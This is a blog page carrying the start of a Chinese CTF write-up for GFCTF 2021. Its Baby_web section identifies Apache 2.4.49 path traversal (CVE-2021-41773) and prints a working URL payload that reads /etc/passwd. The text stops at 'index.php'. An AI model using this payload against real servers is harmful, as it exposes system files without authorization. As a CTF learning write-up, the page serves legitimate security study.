您当前的位置: 首页 > 

Z3eyOnd

暂无认证

  • 5浏览

    0关注

    117博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

2021GFCTF

Z3eyOnd 发布时间:2022-07-07 14:02:01 ,浏览量:5

文章目录
    • 复现环境
    • GFCTF 2021 Baby_web
      • 考点
      • wp
    • GFCTF 2021 文件查看器
      • 考点
      • wp
    • GFCTF 2021 ez_calc

复现环境

https://www.ctfer.vip/problem

GFCTF 2021 Baby_web 考点
  1. Apache 2.4.49的一个目录穿越的cve漏洞

  2. 利用exec外带命令执行

wp

看到Apache的版本号是2.4.49,相信很多小伙伴已经意识到前段时间爆出来的CVE-2021-41773

payload

/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

image-20220707113732070

拿到源码

index.php

            
关注
打赏
1651657201
查看更多评论
0.0415s